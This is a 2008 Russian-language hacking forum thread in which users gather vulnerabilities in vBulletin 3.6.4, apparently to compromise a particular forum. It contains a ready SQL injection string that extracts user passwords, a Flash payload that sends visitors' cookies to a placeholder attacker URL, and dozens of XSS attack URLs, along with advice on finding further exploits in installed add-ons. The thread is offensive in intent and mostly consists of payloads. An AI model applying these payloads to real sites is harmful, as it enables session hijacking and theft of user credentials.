Вопрос. Уязвимости vBulletin 3.6.4
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
Вопрос. Уязвимости vBulletin 3.6.4 - 2008-06-11 23:23:14.326666
|
|
|
[ TRaY ]
Сообщений: 919
Оценки: 0
Присоединился: 2008-03-22 18:47:37.556666
|
В общем полазил по сети в поисках багов, нашел, но там достаточно старое, и не все мне подходит.[:(] У кого есть побольше инфой, не фпадло, поделитесь:) ЗЫ, единственное что норм попалось, это тема с swf, но у меня там что-то не очень…если кто-нить разъяснит - буду очень признателен.
|
|
|
RE: Вопрос. Уязвимости vBulletin 3.6.4 - 2008-06-12 01:26:15.446666
|
|
|
RanDoMix
Сообщений: 1568
Оценки: 0
Присоединился: 2007-10-20 20:09:28.990000
|
Уязвимости vBulletin 3.6.4 vBulletin <= 3.6.4 inlinemod.php "postids" sql injection / privilege (Требуются привилегии модератора) http://milw0rm.com/exploits/3387 Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «postids» сценарием inlinemod.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. http://www.xakep.ru/post/36982/default.asp
|
|
|
RE: Вопрос. Уязвимости vBulletin 3.6.4 - 2008-06-12 01:36:23.890000
|
|
|
RanDoMix
Сообщений: 1568
Оценки: 0
Присоединился: 2007-10-20 20:09:28.990000
|
SQL Injection в админке (тестировалось на версиях 3.6.4 и 3.6.5 ) 1. Log in to admin panel 2. Go to Attachments->Search 3. Place the following string in the Attached Before field:
') union select 1,1,1,1,1,userid,password,1,username from user -- 9
============== Ну и собственно бага со swf. Ты лучше напиши известные хаки, установленные на форуме. Проще будет к ним поискать уязвимости/сплоиты. Если же с самим форумом ничего не получится, возможно будет проще поискать уязвимости в скриптах на сайте, если имеется такая возможность.
|
|
|
RE: Вопрос. Уязвимости vBulletin 3.6.4 - 2008-06-12 01:41:32.493333
|
|
|
[ TRaY ]
Сообщений: 919
Оценки: 0
Присоединился: 2008-03-22 18:47:37.556666
|
1)Уязвимость позволяет удаленному злоумышленнику выполнить произвольный сценарий на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных при обработке входящих запросов. Атакующий может выполнить SWF произвольный сценарий и выкрасть данные аутентификации cookie. getURL("javascript:function blab(){}var scriptNode = +document.createElement('script'); document.getElementsByTagName('body')[0].appendChild(scriptNode);scriptNode.language='java script';scriptNode.src= 'http://www.Yousite.ru/UrPHPpage.php?Cookie='+document.cookie +;blab();"); 2)vBulletin 3.x Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных в поле формы «Extension» сценарием admincp/attachment.php. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта. 3)vBulletin <= 3.6.4 inlinemod.php "postids" sql injection / privilege (Требуются привилегии модератора) http://milw0rm.com/exploits/3387 Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «postids» сценарием inlinemod.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. http://www.xakep.ru/post/36982/default.asp 4)XSS vBulletin 3.6.X Admin Control Painel http://example/vbulletin/admincp/index.php?do=buildnavprefs&nojs=0&prefs = "><script>alert("insanity")</script> http://example/vbulletin/admincp/index.php?do=savenavprefs&nojs=0&navpre fs= "><script>alert("insanity")</script> Вот собрал 4 уязвимости, к сожалению мне ни одна не подходит…(( Вообще на сайте баги поискал и "в ручную" - ниче не дало…
|
|
|
RE: Вопрос. Уязвимости vBulletin 3.6.4 - 2008-06-12 13:58:46.310000
|
|
|
[ TRaY ]
Сообщений: 919
Оценки: 0
Присоединился: 2008-03-22 18:47:37.556666
|
Вот еще по версии 3,6,8 3.6.8 Patch.Level 1 active xss: если вы модератор на форуме, то при бане в поле "причина бана" указываете ваш скрипт, и он сработает: при просмотре забаненых пользователей через: модпанель(например туда может зайти СуперМодератор) админ панель(админ) когда зайдёт юзер в свой акк(сам юзер) clientscript/ieprompt.html какойто недописанный скрипт. global.php или arhive/global.php vBulletin V3.6.8 Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных во множестве сценариев множеством параметров. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта. [site]/[path]/faq.php?s=&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28documen t.cookie%29%3B%3C%2Fscript&match= all&titlesonly=0 [site]/[path]/member.php?u=1=s'&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28documen t.cookie%29%3B%3C%2F script&match=all&titlesonly=1 [site]/[path]/index.php?s=<script>alert('document.cookie')</script> [site]/[path]/faq.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28documen t.cookie%29%3B%3C%2Fscript &match=all&titlesonly=0 [site]/[path]/memberlist.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28documen t.cookie%29%3B%3C%2 Fscript&match=all&titlesonly=0 [site]/[path]/calendar.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28documen t.cookie%29%3B%3C%2F script&match=all&titlesonly=0 [site]/[path]/search.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28documen t.cookie%29%3B%3C%2Fscript &match=all&titlesonly=0 [site]/[path]/search.php?do=getdaily"&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3 Ealert%28document.cookie %29%3B%3C%2Fscript&match=all&titlesonly=0 [site]/[path]/forumdisplay.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28documen t.cookie%29%3B%3C%2Fscript &match=all&titlesonly=0 [site]/[path]/forumdisplay.php?do=markread"&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3E alert%28document.cookie %29%3B%3C%2Fscript&match=all&titlesonly=0 [site]/[path]/forumdisplay.php?f=1"&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28documen t.cookie %29%3B%3C%2Fscript&match=all&titlesonly=0 [site]/[path]/showgroups.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28documen t.cookie%29%3B%3C%2Fscript& match=all&titlesonly=0 [site]/[path]/online.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28documen t.cookie%29%3B%3C%2Fscript& match=all&titlesonly=0 [site]/[path]/member.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28documen t.cookie%29%3B%3C%2F script&match=all&titlesonly=0 [site]/[path]/sendmessage.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28documen t.cookie%29%3B%3C%2F script&match=all&titlesonly=0
|
|
|
RE: Вопрос. Уязвимости vBulletin 3.6.4 - 2008-06-12 22:58:18.540000
|
|
|
RanDoMix
Сообщений: 1568
Оценки: 0
Присоединился: 2007-10-20 20:09:28.990000
|
Чувак, если начал тему про версию 3.6.4 , то и пиши про неё. Вот актуальный вопрос по теме: quote:
Ты лучше напиши известные хаки, установленные на форуме. Проще будет к ним поискать уязвимости/сплоиты. quote:
ну это я его попросил:) А, ну это многое меняет)
|
|
|
RE: Вопрос. Уязвимости vBulletin 3.6.4 - 2008-06-13 09:16:47.366666
|
|
|
oRb
Сообщений: 4044
Оценки: 597
Присоединился: 2007-03-28 18:45:06.630000
|
quote:
Чувак, если начал тему про версию 3.6.4 , то и пиши про неё. ну это я его попросил:)
|
|
|
RE: Вопрос. Уязвимости vBulletin 3.6.4 - 2008-06-18 05:35:08.980000
|
|
|
rr3
Сообщений: 1
Оценки: 0
Присоединился: 2008-06-17 14:24:14.573333
|
А можно сразу готовый файл получить?
|
|
|
RE: Вопрос. Уязвимости vBulletin 3.6.4 - 2008-06-18 11:50:06.743333
|
|
|
[ TRaY ]
Сообщений: 919
Оценки: 0
Присоединился: 2008-03-22 18:47:37.556666
|
Какой файл? Оо
|
|
|
|
|